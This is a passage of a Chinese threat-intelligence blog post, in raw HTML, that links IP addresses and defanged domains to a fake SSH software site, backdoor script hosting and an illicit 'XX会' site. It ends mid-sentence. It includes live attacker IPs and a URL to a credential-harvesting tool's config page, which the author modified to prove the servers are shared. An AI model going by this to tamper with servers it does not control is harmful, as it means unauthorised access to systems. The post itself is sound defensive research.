src="https://wechat2rss.xlab.app/img-proxy/?k=50ec3a26&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9j03bcJvLyZtQdsgNpqhp4G99ssvsDGyhJlWKH0QhvibBeIgPOVWlZpQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">154.19.200.213</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">目前 154.19.200.214、154.19.200.212 都已经出镜，合理怀疑 154.19.200.213 应该是连号的吧。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">反查 154.19.200.213 的域名解析，历史上既有假冒的 SSH 软件，又有前面没有发现的XX会相关字眼的域名，还有和 154.19.200.212 对应的域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXX88[.]net</span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXX686[.]com</span></code><span leaf=""> 一样会跳转到XX会官网的业务域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXX16[.]com</span></code><span leaf=""> 、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXn86[.]com</span></code><span leaf="">、</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jn598[.]com</span></code><span leaf="">。</span></p><p><img data-imgfileid="100001581" class="rich_pages wxw-img" data-ratio="0.42797619047619045" data-s="300,640" data-type="png" data-w="3360" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=23c816d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9h2B4p0GwtffTDxtDwiaNPjvbHKCE7aEfC6C7ia38XquAuyTyZ1o1X1SQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且能根据网页标题判断出来域名的解析目前应该也是在调整和变化当中的。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.jXX66[.]net</span></code><span leaf=""> 目前还解析到 154.19.200.213，12月26号的时候 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.jXX66[.]net</span></code><span leaf=""> 对应的标题还是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7zei[.]com</span></code><span leaf=""> 那个假冒 SSH 软件的标题，今天访问已经跳转到XX会登陆页了。</span></p><p><img data-imgfileid="100001580" class="rich_pages wxw-img" data-ratio="0.20730976632714201" data-s="300,640" data-type="png" data-w="3338" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c053c165&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9BqSljOsjsehUFgrOiaPoEvNb4Cicnv1WOWUFlkqNib9v3ibxDKHYHYoFjg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001582" class="rich_pages wxw-img" data-ratio="0.31075110456553756" data-s="300,640" data-type="png" data-w="2716" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=64ec7908&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9XOfAL1fEVbuByv24yGqUia2vNNHQm0PVIzqRkhjvfXuqh1bRicvSpHXQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">如何证明 154.19.200.212/3/4 同机器</span></span><span style="display: none;"></span></h5><ol style="list-style-type: decimal;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">端口开放一模一样。</span></p></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">修改 CredsLeaker 项目的 config.php，同步改动。</span></p><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">将 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://154.19.200.212/config.php" target="_blank">https://154.19.200.212/config.php</a></span></code><span leaf="">  的 creds.csv 修改为 creds233.csv。</span></p><p><img data-imgfileid="100001583" class="rich_pages wxw-img" data-ratio="0.5757314974182444" data-s="300,640" data-type="png" data-w="2324" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=52de67bd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9icLd2Ua6IHfEmbNy8dyWsklicjRBSHtEicqRgibWuCicWGmmicuT0I4y2AiaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">访问 213、214 会得到相同的改动。</span></p><p><img data-imgfileid="100001584" class="rich_pages wxw-img" data-ratio="0.5670886075949367" data-s="300,640" data-type="png" data-w="2370" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=342f538c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9grmlxevgecTqqsvhpPu0IXUStiaKzzcZ2mqCic6AMLxMp5IDKSljwYSQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><figure style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><span leaf=""><img data-imgfileid="100001585" class="rich_pages wxw-img" data-ratio="0.6094727435210009" data-s="300,640" data-type="png" data-w="2238" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=29ac9f9b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9hGcK6usnBprrK4UobFCGwe3YPMkicJk3Fdy2lcF83BWQkbahOAe3Whg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="color: rgb(136, 136, 136);font-size: 14px;line-height: 1.5em;letter-spacing: 0em;text-align: center;font-weight: normal;margin-top: 5px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span leaf=""><br/></span></figcaption></figure></li><li><p style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">跟 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7zei[.]com</span></code><span leaf=""> 共用证书的 </span><code style="height: auto;color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">88.ayyhxx[.]cn</span></code><span leaf=""> 解析到 154.19.200.213。</span></p><p><img data-imgfileid="100001586" class="rich_pages wxw-img" data-ratio="0.3144774688398849" data-s="300,640" data-type="png" data-w="2086" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=333660ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY90HoiapD6YYqK22JjJtLdmZ2tR5XOyics19q8wPGfON0ar6EsA2icKeE9g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001587" class="rich_pages wxw-img" data-ratio="0.5425196850393701" data-s="300,640" data-type="png" data-w="2540" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bdb23702&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ozw8oftINxVrNk8m05Ds5fzqAMzV2PAFvQDD47ZJBcUPAibIzHyEIow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf=""><br/></span></p></li></ol><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">分析到这里，现在 &#34;XX会&#34; 似乎直接跟 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">7zei[.]com</span></code><span leaf=""> 这个带有假冒 SSH 软件官网、CSDN 第二层样本关联、后门脚本托管 的域名有了直接的关联。</span></p><p><img data-imgfileid="100001589" class="rich_pages wxw-img" data-ratio="0.6223684210526316" data-s="300,640" data-type="png" data-w="3040" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bb76acdd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9m40oGtBcuZ9TsXzFdG9mZnKdyZyib55iaUz8EJhwUMZVeJIZgpNiam4ibA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">了解XX会</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">Google 直接搜索 &#34;XX会&#34;，可以看到各种被挂黑链的站。</span></p><p><img data-imgfileid="100001588" class="rich_pages wxw-img" data-ratio="0.8017467248908297" data-s="300,640" data-type="png" data-w="2290" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0b53be11&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ibMtQ3h2KyJB1k6dtgFTmG8e8lTyHgicFljnREU6C9qkZa3wBc2EC8UA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">甚至还有 gXv.cn。</span></p><p><img data-imgfileid="100001590" class="rich_pages wxw-img" data-ratio="0.822380106571936" data-s="300,640" data-type="png" data-w="2252" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fc1144f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY94xA8DVqAiaicB2ctnaoepbPmx0mseL8aACWW7F0mM9ldpZh9TQNsNkeg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看网络行为可以看到加载了一个 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">r.18pk[.]com</span></code><span leaf=""> 的 js，js当中有定义广告相关的资源。</span></p><p><img data-imgfileid="100001591" class="rich_pages wxw-img" data-ratio="0.23662790697674418" data-s="300,640" data-type="png" data-w="3440" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=74489f9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9obYFuTtGyorYFR1V1CjDlpo7dREhQVkL1G6ndk9e4ribviae0bJ14mLQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">比如这个 banner 页。</span></p><p><img data-imgfileid="100001592" class="rich_pages wxw-img" data-ratio="0.6590683845391476" data-s="300,640" data-type="png" data-w="2018" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fb45a4df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9JMfogG9qlfeSbxFa6g8BmmB8ibFF3tB6rkT6AlZLSdWn5Spgew8PJibQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">找到了一个测试跳转的页面。</span></p><p><img data-imgfileid="100001593" class="rich_pages wxw-img" data-ratio="0.43132530120481927" data-s="300,640" data-type="png" data-w="1660" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=56ace40a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ibhT9zY9FaVwEaSBKeF7ibIeHdr4sjKTyBg9MsDNCmlmjThLOjY7SUZg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">跳转测试的网页中 js 特意排除掉北京市的 IP 